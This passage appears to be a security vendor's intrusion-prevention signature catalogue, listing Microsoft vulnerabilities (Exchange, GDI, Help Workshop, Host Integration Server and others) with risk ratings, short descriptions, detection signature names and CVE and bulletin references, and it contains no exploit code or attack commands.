HTTP_CRL-Microsoft-Exchange-SSRF-CVE-2021-34473-2
HTTP_CRH-Microsoft-Exchange-SSRF-CVE-2021-34473

References:

CVE-2021-34473
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34473

ms21-jul
http://technet.microsoft.com/security/bulletin/ms21-jul

Microsoft-Exchange-SSRF-CVE-2022-41040

About this vulnerability:

A vulnerability in Microsoft Exchange

Risk:

High

First detected in:

sgpkg-ips-1509-5242

Last changed:

sgpkg-ips-1532-5242

Platform:

Windows

Software:

Exchange Server

Type:

Malfunction

Description:

Two zero-day vulnerabilities affecting Microsoft Exchange Server have been reported to Microsoft. The first one, identified as CVE-2022-41040, is a Server-Side Request Forgery (SSRF) vulnerability, and the second one, identified as CVE-2022-41082, allows Remote Code Execution (RCE) when PowerShell is accessible to the attacker.

Situation:

HTTP_CSU-Microsoft-Exchange-SSRF-CVE-2022-41040

References:

CVE-2022-41040
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41040

Microsoft-Exchange-TNEF-Buffer-Overflow-MS09-003

About this vulnerability:

Microsoft Exchange TNEF Code Execution

Risk:

High

First detected in:

sgpkg-ips-205-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Exchange Server 2000; Exchange Server 2003; Exchange Server 2007

Type:

Buffer Overflow

Description:

There is a Integer Underflow vulnerability exists in the way Microsoft Exchange Server handles email messages. The vulnerability is a result of insufficient boundary checking when decoding the Transport Neutral Encapsulation Format (TNEF) data for a message. An attacker can exploit this vulnerability for code execution by sending a specially crafted email to an account on the target server. Any code injected using this vulnerability would be executed in the System security context. An attack targeting this vulnerability can result in the injection and execution of code. If code execution is successful, the behaviour of the target will depend on the intention of the attacker. Note that any code injected will be executed within the security context of the Exchange Server application, normally System

Situation:

SMTP_CS-Microsoft-Exchange-TNEF-Decoding-MS09-003-Bp
E-Mail_BS-Microsoft-Exchange-TNEF-Decoding-MS09-003-Buffer-Overflow
File-Binary_Microsoft-Exchange-TNEF-Decoding-MS09-003-Buffer-Overflow

References:

CVE-2009-0098
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0098

OSVDB-51837
http://www.osvdb.org/51837

MS09-003
http://technet.microsoft.com/security/bulletin/MS09-003

Microsoft-Exchange-Transportconfigcontainer-Insecure-Deserialization

About this vulnerability:

A vulnerability in Microsoft Exchange Server

Risk:

Moderate

First detected in:

sgpkg-ips-1673-5242

Last changed:

sgpkg-ips-1673-5242

Platform:

Windows

Software:

Exchange Server

Type:

Input Validation

Description:

Situation:

File-TextId_Microsoft-Exchange-Transportconfigcontainer-Insecure-Deserialization

References:

CVE-2023-36050
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-36050

ms23-nov
http://technet.microsoft.com/security/bulletin/ms23-nov

Microsoft-Exchange-Unsafe-Deserialization-CVE-2022-41082

About this vulnerability:

A vulnerability in Microsoft Exchange

Risk:

High

First detected in:

sgpkg-ips-1530-5242

Last changed:

sgpkg-ips-1599-5242

Platform:

Windows

Software:

Exchange Server

Type:

Malfunction

Description:

The attacker for this vulnerability could target the server accounts in an arbitrary or remote code execution. As an authenticated user, the attacker could attempt to trigger malicious code in the context of the server's account through a network call.

Situation:

File-TextId_Microsoft-Exchange-Unsafe-Deserialization

References:

CVE-2022-41082
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41082

Microsoft-Exchange-Unsafe-Deserialization-CVE-2023-21529

About this vulnerability:

An attempt to exploit a vulnerability in Exchange Server detected

Risk:

High

First detected in:

sgpkg-ips-1556-5242

Last changed:

sgpkg-ips-1599-5242

Platform:

Windows

Software:

Exchange Server

Type:

Malfunction

Description:

An unsafe deserialization issue has been identified in Microsoft Exchange server. This vulnerability can be exploited to achieve remote code execution.

Situation:

File-TextId_Microsoft-Exchange-Unsafe-Deserialization

References:

CVE-2023-21529
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-21529

ms23-feb
http://technet.microsoft.com/security/bulletin/ms23-feb

Microsoft-Exchange-Unsafe-Deserialization-CVE-2023-21706

About this vulnerability:

An attempt to exploit a vulnerability in Exchange Server detected

Risk:

High

First detected in:

sgpkg-ips-1556-5242

Last changed:

sgpkg-ips-1599-5242

Platform:

Windows

Software:

Exchange Server

Type:

Malfunction

Description:

An unsafe deserialization issue has been identified in Microsoft Exchange server. This vulnerability can be exploited to achieve remote code execution.

Situation:

File-TextId_Microsoft-Exchange-Unsafe-Deserialization

References:

CVE-2023-21706
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-21706

ms23-feb
http://technet.microsoft.com/security/bulletin/ms23-feb

Microsoft-Exchange-Validation-Key-Remote-Code-Execution

About this vulnerability:

A vulnerability in Microsoft Exchange

Risk:

High

First detected in:

sgpkg-ips-1232-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

There exists a vulnerability in Exchange Control Panel (ECP) component. The ECP component is using s static validation key that can lead in arbitrary code execution on the target system. This situation can generate false-positive events on unpatched Microsoft Exchange systems.

Situation:

HTTP_CRL-Microsoft-Exchange-Validation-Key-Remote-Code-Execution

References:

CVE-2020-0688
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0688

Microsoft-Exchange-XSS-CVE-2015-1632

About this vulnerability:

A vulnerability in Microsoft Exchange

Risk:

High

First detected in:

sgpkg-ips-633-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Exchange Server

Type:

Cross-site Scripting

Description:

A vulnerability in Microsoft Exchange

Situation:

HTTP_CSU-Microsoft-Exchange-XSS-CVE-2015-1632

References:

CVE-2015-1632
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1632

MS15-026
http://technet.microsoft.com/security/bulletin/MS15-026

Microsoft-Explorer-Long-Share-Name-Buffer-Overflow

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-436-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Buffer Overflow

Description:

A buffer overflow has been found in Microsoft Windows Explorer and Internet Explorer that can be exploited with an excessively long share name. This vulnerability exists in all versions of Windows including 98, ME, 2000, and XP. In the remote exploit case it is expected that an attack against a vulnerable Windows server will crash the Windows Explorer or Internet Explorer and trigger a buffer overflow error upon receiving a malformed packet, leading to a denial of service. It is also possible for a remote attacker, using a properly crafted share name, to execute arbitrary code running in the context of the presently logged in user.

Situation:

NetBIOS-TCP_Microsoft-Explorer-Long-Share-Name-Buffer-Overflow

References:

CVE-2004-0214
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0214

BID-10213
http://www.securityfocus.com/bid/10213

OSVDB-5687
http://www.osvdb.org/5687

MS04-037
http://technet.microsoft.com/security/bulletin/MS04-037

Microsoft-Expression-Design-Insecure-Library-Loading-CVE-2012-0016

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

High

First detected in:

sgpkg-ips-443-4219

Last changed:

sgpkg-ips-1639-5242

Platform:

Windows

Software:

Microsoft Expression Design

Type:

Malfunction

Description:

There is a vulnerability in Microsoft Expression Design.

Situation:

HTTP_CSU-Insecure-Microsoft-Library-Loading
SMB-TCP_CHS_Microsoft-Expression-Design-Insecure-Library-Loading-CVE-2012-0016

References:

CVE-2012-0016
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0016

MS12-022
http://technet.microsoft.com/security/bulletin/MS12-022

Microsoft-Filter-Manager-Elevation-Of-Privilege-Vulnerability-CVE-2018-8333

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

High

First detected in:

sgpkg-ips-1108-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

There exists a use-after-free vulnerability in Microsoft Windows. A remote attacker can use this to execute arbitrary code on the affected system.

Situation:

SMB-TCP_SS-Microsoft-Filter-Manager-Elevation-Of-Privilege-Vulnerability-CVE-2018-8333

References:

CVE-2018-8333
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8333

ms18-oct
http://technet.microsoft.com/security/bulletin/ms18-oct

Microsoft-Forefront-Unified-Access-Gateway-Signurl.asp-XSS

About this vulnerability:

A vulnerability in Microsoft Forefront Unified Access Gateway

Risk:

Moderate

First detected in:

sgpkg-ips-435-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Forefront Unified Access Gateway

Type:

Cross-site Scripting

Description:

A cross-site scripting vulnerability exists in Microsoft Forefront Unified Access Gateway (UAG). The vulnerability is due to insufficient validation of user-supplied input in signurl.asp. A remote attacker can exploit this flaw by enticing a target to open a malicious URL link. Successful exploitation would result in compromise of web browser cookies (including authentication cookies) associated with the site, and modification of user information.

Situation:

File-Text_Microsoft-Forefront-Unified-Access-Gateway-Signurl.asp-XSS

References:

CVE-2010-3936
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3936

MS10-089
http://technet.microsoft.com/security/bulletin/MS10-089

Microsoft-FrontPage-Information-Disclosure-Vulnerability

About this vulnerability:

A vulnerability in Microsoft FrontPage

Risk:

High

First detected in:

sgpkg-ips-542-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft FrontPage

Type:

Malfunction

Description:

There is an information disclosure vulnerability in Microsoft FrontPage.

Situation:

File-TextId_Microsoft-FrontPage-Information-Disclosure-Vulnerability

References:

CVE-2013-3137
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3137

MS13-078
http://technet.microsoft.com/security/bulletin/MS13-078

Microsoft-FrontPage-Server-Extensions-MS-DOS-Device-Name-Denial-Of-Service

About this vulnerability:

A vulnerability in Microsoft FrontPage

Risk:

High

First detected in:

sgpkg-ips-581-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Microsoft FrontPage

Type:

Malfunction

Description:

The shtml.exe component of Microsoft FrontPage 2000 Server Extensions 1.1 allows remote attackers to cause a denial of service in some components by requesting a URL whose name includes a standard DOS device name.

Situation:

HTTP_CSU-Microsoft-FrontPage-Server-Extensions-MS-DOS-Device-Name-Denial-Of-Service

References:

CVE-2000-0710
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0710

BID-1608
http://www.securityfocus.com/bid/1608

Microsoft-GDI-Vulnerability-CVE-2009-2501

About this vulnerability:

Microsoft GDI+ vulnerability MS09-061

Risk:

High

First detected in:

sgpkg-ips-258-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

Microsoft Windows GDI+ parser vulnerability MS09-061.

Situation:

HTTP_SS-Microsoft-GDI-Vulnerability-CVE-2009-2501
File-PNG_Microsoft-Multiple-Products-Buffer-Overflow

References:

CVE-2009-2501
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2501

MS09-061
http://technet.microsoft.com/security/bulletin/MS09-061

Microsoft-Graphics-Component-Createcolorspacew-Information-Disclosure

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-766-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

An attempt to exploit a vulnerability in the GDI component of Microsoft Windows detected

Situation:

File-Binary_Microsoft-Graphics-Component-Createcolorspacew-Information-Disclosure
File-Binary_Microsoft-Graphics-Component-Createcolorspace-Information-Disclosure2

References:

CVE-2016-0168
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0168

MS16-055
http://technet.microsoft.com/security/bulletin/MS16-055

Microsoft-Graphics-Component-CVE-2016-0169-Information-Disclosure

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-764-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

A vulnerability in Microsoft Windows.

Situation:

File-Binary_Microsoft-Graphics-Component-CVE-2016-0169-Information-Disclosure

References:

CVE-2016-0169
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0169

MS16-055
http://technet.microsoft.com/security/bulletin/MS16-055

Microsoft-Graphics-Component-CVE-2016-3348

About this vulnerability:

A vulnerability in Windows

Risk:

Moderate

First detected in:

sgpkg-ips-800-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Input Validation

Description:

A vulnerability in Windows

Situation:

File-Exe_Microsoft-Graphics-Component-CVE-2016-3348

References:

CVE-2016-3348
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3348

MS16-106
http://technet.microsoft.com/security/bulletin/MS16-106

Microsoft-Graphics-Component-CVE-2017-0025

About this vulnerability:

A vulnerability in Microsoft Graphics Component

Risk:

Moderate

First detected in:

sgpkg-ips-863-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

A privilege escalation vulnerability in Microsoft Graphics Component.

Situation:

File-Binary_Microsoft-Graphics-Component-CVE-2017-0025

References:

CVE-2017-0025
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0025

MS17-013
http://technet.microsoft.com/security/bulletin/MS17-013

Microsoft-Graphics-Component-CVE-2018-8396-Information-Disclosure

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-1141-5242

Last changed:

sgpkg-ips-1691-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

An information disclosure vulnerability exists in the GDI components of Microsoft Windows. The vulnerability is due to improper handling of objects in memory. A remote attacker could exploit the vulnerability by enticing user to open a specially crafted document, or webpage. Successful exploitation could result in disclosure of information which could be used to further compromise the target system.

Situation:

File-Binary_Microsoft-Graphics-Component-CVE-2018-8396-Information-Disclosure
File-RTF_Microsoft-Graphics-Component-CVE-2018-8396-Information-Disclosure

References:

CVE-2018-8396
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8396

ms18-aug
http://technet.microsoft.com/security/bulletin/ms18-aug

Microsoft-Graphics-Component-CVE-2018-8472-Information-Disclosure

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-1111-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

A vulnerability in Microsoft Windows

Situation:

File-Binary_Microsoft-Graphics-Component-CVE-2018-8472-Information-Disclosure

References:

CVE-2018-8472
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8472

Microsoft-Graphics-Component-Information-Disclosure-CVE-2014-6355

About this vulnerability:

A vulnerability in Microsoft Graphics Component

Risk:

High

First detected in:

sgpkg-ips-620-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows 7; Windows 8; Windows 8.1; Windows RT; Windows RT 8.1; Windows 2003; Windows 2008; Windows 2008; Windows 2008 R2; Windows 2012; Windows 2012 R2

Software:

<os>

Type:

Malfunction

Description:

There is an information disclosure vulnerability in Microsoft Graphics Component. Successful exploitation could result in information disclosure with the privileges of the currently logged in user.

Situation:

File-JPEG_Microsoft-Graphics-Component-Information-Disclosure-CVE-2014-6355

References:

CVE-2014-6355
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6355

OSVDB-113201
http://www.osvdb.org/113201

MS14-085
http://technet.microsoft.com/security/bulletin/MS14-085

Microsoft-Graphics-Device-Interface-CVE-2016-3263-Information-Disclosure

About this vulnerability:

A vulnerability in Microsoft .NET Framework

Risk:

Moderate

First detected in:

sgpkg-ips-812-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

A vulnerability in Microsoft .NET Framework

Situation:

File-Binary_Microsoft-Graphics-Device-Interface-CVE-2016-3263-Information-Disclosure

References:

CVE-2016-3263
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3263

MS16-120
http://technet.microsoft.com/security/bulletin/MS16-120

Microsoft-Graphics-Device-Interface-CVE-2018-8397-Code-Execution

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

High

First detected in:

sgpkg-ips-1693-5242

Last changed:

sgpkg-ips-1693-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

A code execution vulnerability exists in the Graphics Device Interface (GDI) component of Microsoft Windows.

Situation:

File-Binary_Microsoft-Graphics-Device-Interface-CVE-2018-8397-Code-Execution

References:

CVE-2018-8397
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8397

ms18-aug
http://technet.microsoft.com/security/bulletin/ms18-aug

Microsoft-Graphics-Device-Interface-CVE-2019-0619-Information-Disclosure

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-1141-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Input Validation

Description:

Improper handling of objects in memory causes a vulnerability in Windows. Exploits allow information to be disclosed.

Situation:

File-Binary_Microsoft-Graphics-Device-Interface-CVE-2019-0619-Information-Disclosure

References:

CVE-2019-0619
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0619

Microsoft-Graphics-Device-Interface-CVE-2019-0961-Information-Disclosure

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-1198-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Input Validation

Description:

There exists an information disclosure vulnerability in the Graphics Device Interface (GDI) component of Microsoft Windows. Successful exploitation could lead in information disclosure.

Situation:

File-Binary_Microsoft-Graphics-Device-Interface-CVE-2019-0961-Information-Disclosure

References:

CVE-2019-0961
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0961

Microsoft-Graphics-Device-Interface-Information-Disclosure-CVE-2019-0616

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-1137-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Input Validation

Description:

An information disclosure vulnerability exists in the Graphics Device Interface (GDI) component of Microsoft Windows. The vulnerability is due to improper handling of objects in memory. A remote attacker could exploit the vulnerability by enticing a user to open a specially crafted web page or document. Successful exploitation could result in disclosure of information which could be used to further compromise the target system.

Situation:

File-Binary_Microsoft-Graphics-Device-Interface-Information-Disclosure-CVE-2019-0616

References:

CVE-2019-0616
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0616

Microsoft-Graphics-Device-Interface-Wemrtext-Information-Disclosure

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-1151-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Input Validation

Description:

A vulnerability in the Graphics Device Interface (GDI) component of Microsoft Windows can be exploited to disclose information about the system.

Situation:

File-Binary_Microsoft-Graphics-Device-Interface-Wemrtext-Information-Disclosure

References:

CVE-2019-0802
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0802

Microsoft-Graphics-Heap-Buffer-Overflow-Vulnerability-CVE-2018-1010

About this vulnerability:

A heap buffer overflow vulnerability in Microsoft Windows

Risk:

High

First detected in:

sgpkg-ips-1057-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Input Validation

Description:

There exists a heap buffer overflow vulnerability the Windows font library. A remote attacker can use this to execute arbitrary code on the affected system.

Situation:

File-Binary_Microsoft-Graphics-Heap-Buffer-Overflow-Vulnerability-CVE-2018-1010

References:

CVE-2018-1010
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1010

ms18-apr
http://technet.microsoft.com/security/bulletin/ms18-apr

Microsoft-Graphics-Integer-Overflow-Vulnerability-CVE-2018-1015

About this vulnerability:

An Integer Overflow vulnerability in Microsoft Windows

Risk:

High

First detected in:

sgpkg-ips-1057-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Input Validation

Description:

There exists an Integer overflow vulnerability the Windows font library. A remote attacker can use this to execute arbitrary code on the affected system.

Situation:

File-Binary_Microsoft-Graphics-Integer-Signedness-Vulnerability-CVE-2018-1015

References:

CVE-2018-1015
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1015

ms18-apr
http://technet.microsoft.com/security/bulletin/ms18-apr

Microsoft-Graphics-Integer-Overflow-Vulnerability-CVE-2018-1016

About this vulnerability:

An Integer Overflow vulnerability in Microsoft Windows

Risk:

High

First detected in:

sgpkg-ips-1057-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Input Validation

Description:

There exists an Integer overflow vulnerability the Windows font library. A remote attacker can use this to execute arbitrary code on the affected system.

Situation:

File-Binary_Microsoft-Graphics-Integer-Signedness-Vulnerability-CVE-2018-1016

References:

CVE-2018-1016
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1016

ms18-apr
http://technet.microsoft.com/security/bulletin/ms18-apr

Microsoft-Graphics-Integer-Signedness-Vulnerability-CVE-2018-1012

About this vulnerability:

An Integer Signedness vulnerability in Microsoft Windows

Risk:

High

First detected in:

sgpkg-ips-1057-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Input Validation

Description:

There exists an Integer Signedness vulnerability the Windows font library. A remote attacker can use this to execute arbitrary code on the affected system.

Situation:

File-Binary_Microsoft-Graphics-Integer-Signedness-Vulnerability-CVE-2018-1012

References:

CVE-2018-1012
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1012

ms18-apr
http://technet.microsoft.com/security/bulletin/ms18-apr

Microsoft-Graphics-Integer-Signedness-Vulnerability-CVE-2018-1013

About this vulnerability:

An Integer Signedness vulnerability in Microsoft Windows

Risk:

High

First detected in:

sgpkg-ips-1057-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Input Validation

Description:

There exists an Integer Signedness vulnerability the Windows font library. A remote attacker can use this to execute arbitrary code on the affected system.

Situation:

File-Binary_Microsoft-Graphics-Integer-Signedness-Vulnerability-CVE-2018-1013

References:

CVE-2018-1013
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1013

ms18-apr
http://technet.microsoft.com/security/bulletin/ms18-apr

Microsoft-Graphics-Rendering-Engine-Thumbnail-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

High

First detected in:

sgpkg-ips-368-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows Vista; Windows XP; Windows 2003; Windows 2008

Software:

<os>

Type:

Buffer Overflow

Description:

There is a stack buffer overflow vulnerability in Microsoft's Graphics Rendering Engine.

Situation:

HTTP_SS-Microsoft-Graphics-Rendering-Engine-Thumbnail-Stack-Buffer-Overflow
File-OLE_Microsoft-Graphics-Rendering-Engine-Thumbnail-Stack-Buffer-Overflow

References:

CVE-2010-3970
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3970

BID-45662
http://www.securityfocus.com/bid/45662

MS11-006
http://technet.microsoft.com/security/bulletin/MS11-006

Microsoft-Groove-Insecure-Library-Loading-CVE-2011-3146

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

High

First detected in:

sgpkg-ips-380-4219

Last changed:

sgpkg-ips-1734-5242

Platform:

Windows

Software:

Microsoft Groove 2007

Type:

Malfunction

Description:

There is a vulnerability in Microsoft Groove 2007.

References:

CVE-2011-3146
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3146

MS11-016
http://technet.microsoft.com/security/bulletin/MS11-016

Microsoft-Help-Centre-Malformed-Escape-Sequence

About this vulnerability:

A vulnerability in Microsoft Help Centre

Risk:

High

First detected in:

sgpkg-ips-312-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Input Validation

Description:

There is a vulnerability in the Microsoft Windows Help Centre protocol handler (HPC). The protocol handler does not process invalid escape sequences correctly, allowing execution of arbitrary code in the context of the current user.

Situation:

HTTP_SS-Microsoft-Help-Centre-Protocol-Access
HTTP_SS-Microsoft-Help-Centre-Malformed-Escape-Sequence
File-Text_Microsoft-Help-Centre-Protocol-Access
File-Text_Microsoft-Help-Centre-Malformed-Escape-Sequence
File-Text_Microsoft-Help-Centre-Code-Execution

References:

CVE-2010-1885
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1885

BID-40725
http://www.securityfocus.com/bid/40725

MS10-042
http://technet.microsoft.com/security/bulletin/MS10-042

Microsoft-Help-Workshop-CNT-Help-Contents-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability in Microsoft Help Workshop

Risk:

Moderate

First detected in:

sgpkg-ips-94-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Help Workshop

Type:

Buffer Overflow

Description:

There is a stack-based buffer overflow vulnerability in Microsoft Help Workshop. An excessively long string in a Help Content (CNT) file can allow arbitrary code execution with the privileges of the current user.

Situation:

HTTP_Microsoft-Help-Workshop-CNT-Help-Contents-Buffer-Overflow
File-TextId_Microsoft-Help-Workshop-CNT-Help-Contents-Buffer-Overflow

References:

CVE-2007-0352
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0352

BID-22100
http://www.securityfocus.com/bid/22100

OSVDB-31898
http://www.osvdb.org/31898

Microsoft-Help-Workshop-Hpj-Options-Section-Buffer-Overflow

About this vulnerability:

A buffer overflow vulnerability in Microsoft Help Workshop

Risk:

Moderate

First detected in:

sgpkg-ips-93-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Help Workshop

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in Microsoft Help Workshop. A malicious parameter supplied in the OPTIONS section of Help Project (HPJ) file can be used to exploit static buffer. This may lead to code execution.

Situation:

HTTP_Microsoft-Help-Workshop-Hpj-Options-Section-Buffer-Overflow
File-TextId_Microsoft-Help-Workshop-Hpj-Options-Section-Buffer-Overflow

References:

CVE-2007-0427
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0427

BID-22135
http://www.securityfocus.com/bid/22135

OSVDB-31899
http://www.osvdb.org/31899

Microsoft-Host-Integration-Server-Remote-Command-Execution-Vulnerability

About this vulnerability:

A vulnerability in Microsoft Host Integration Server

Risk:

High

First detected in:

sgpkg-ips-174-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Host Integration Server

Type:

Input Validation

Description:

There is a memory corruption vulnerability in Microsoft Message Queuing Service included in Microsoft Windows 2000. The vulnerability is caused by a failure to validate messages containing user-defined memory addresses. Remote unauthenticated attackers can exploit this vulnerability by sending specially crafted messages to the affected interface. A successful exploitation can lead to arbitrary code execution with System-level privileges.

Situation:

Generic_MSRPC-CPS-MS-Host-Integration-Server-Vulnerable-Interface-Called
MSRPC-TCP_CPS-Microsoft-Host-Integration-Server-Vulnerable-Interface-Called

References:

CVE-2008-3466
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3466

BID-31620
http://www.securityfocus.com/bid/31620

MS08-059
http://technet.microsoft.com/security/bulletin/MS08-059

Microsoft-Host-Integration-Server-Snabase-CVE-2011-2007

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-417-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Host Integration Server 2004; Microsoft Host Integration Server 2006; Microsoft Host Integration Server 2009; Microsoft Host Integration Server 2010

Type:

Malfunction

Description:

There is a vulnerability in Microsoft Host Integration Server.

References:

CVE-2011-2007
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2007

MS11-082
http://technet.microsoft.com/security/bulletin/MS11-082

Microsoft-Host-Integration-Server-Snabase.exe-Infinite-Loop-DOS

About this vulnerability:

An attempt to exploit a vulnerability in Microsoft Host Integration Server

Risk:

Moderate

First detected in:

sgpkg-ips-395-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Host Integration Server

Type:

Malfunction

Description:

A denial of service vulnerability exists in the snabase.exe component of Microsoft's Host Integration Server, which is an add-on component of Microsoft's BizTalk Enterprise Service Business Suite. Specifically, this vulnerability is due to an infinite loop when processing certain malicious packets.

Situation:

Generic_CS-Microsoft-Host-Integration-Server-Snabase.exe-Infinite-Loop-DOS

References:

CVE-2011-2007
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2007

OSVDB-76223
http://www.osvdb.org/76223

MS11-082
http://technet.microsoft.com/security/bulletin/MS11-082

Microsoft-HTTP-Services-Chunked-Encoding-Integer-Overflow

About this vulnerability:

A vulnerability in Microsoft Windows HTTP Services

Risk:

High

First detected in:

sgpkg-ips-367-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows 2000; Windows Vista; Windows XP; Windows 2003; Windows 2008

Software:

<os>

Type:

Integer Overflow

Description:

There is an integer overflow vulnerability in Microsoft Windows HTTP Services. The flaw is due to improper validation of parameters returned by a remote Web server. An attacker can persuade the target user or a service running on the target system to connect to a malicious Web Sever to exploit this vulnerability. Successful attack could allow for arbitrary code execution and complete control of the targeted system. In an attack scenario, where arbitrary code is injected and executed on the target system, the attacker could install applications; access, modify, and delete data; or create new accounts with privileges of the user or service that connected to the malicious web server.

Situation:

HTTP_SCH-Microsoft-HTTP-Services-And-Nginx-Chunked-Encoding-Vulnerabilities

References:

CVE-2009-0086
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0086

BID-34435
http://www.securityfocus.com/bid/34435

OSVDB-53620
http://www.osvdb.org/53620

MS09-013
